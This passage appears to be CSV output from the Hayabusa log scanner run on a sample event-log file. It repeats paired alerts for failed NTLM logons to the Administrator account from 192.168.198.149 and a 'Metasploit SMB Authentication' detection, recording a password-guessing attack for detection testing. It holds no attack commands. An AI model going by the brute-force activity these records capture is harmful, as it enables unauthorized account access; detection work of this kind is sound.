SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1kYfoqz1r1NuEn04 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.791 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7X400gufqdunUa8j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.791 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lLR8z7g0GY8r7a1r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.867 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: QHMztrxiKBGtNqkp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.867 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7eBQevVhmZs5gHFD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.905 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lyQCs0PG6fGzpidu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.953 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnsPjnCieyoFIbJZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:48.996 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ku6mjVaG1lCJrAo1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VwiyVIWHOGuHzhdO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 92v1rXcj5c0Lt3OF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yO2JYd6FfM2Y7px9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ltr5g8ZWUAdrPKxg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fjiPMy5uOTbbmaQ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.272 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: HDRVOzxca9wDJziV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DV28RjUK26Je2Dr9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.382 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seoetT43w0S3FEss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.382 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IdIU9Q9Ig4Bd3Aps : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.422 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGzuHSHT59Qnp5jI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wPA1J7aQrZ064WSf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhLFXDMUKGfdoc4S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: apVAhc6o3dhLmUll : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.621 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FYMdQeB4ZpFm8xDh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.656 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QewW1ISqRdXwtSXA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.698 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: SFhBcgZfc9VZ5S8S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.734 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a4ZSRW7F65yDNbJd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HrbzGNYIbjErVtDR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.809 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eFcGaL3asLVIF08d : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.853 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dhJvIM5PzA9U6GTD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.892 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KYrfD15TPp8OuST4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.942 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8d4CbZSTHhl7fRfa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.978 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.027 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IItrtl1h3PsKviaQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.027 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WVeoptuwLNKlm0V2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.075 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.222 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rf6Ri9Lm81mScRt4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.222 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: NPVkTRUILL5czcbF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.282 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QZJq3kjykwzh0hVh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lHL4KuirjQ96Dgfw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.374 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DSPjDklMHdW6LqK5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.418 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EL0oMweyFgI0MEdM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.514 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NJS2dZhWmCGF1Qos : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.514 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bNR5dXXnx0LeyNmW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ApUMxqDiqDNo6hrF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.605 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o3d1caGukhhBHp6s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.653 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oxDVCaWpkSECRoml : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: coqijUGaaVJXY4GV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7ATPa6qMbfQ9QDrW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.790 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mnQEE00r01jhCNzr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.946 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ir9sY7kG6vbOad4z : IP Address: 192.168.198.149 : AuthPackage: 
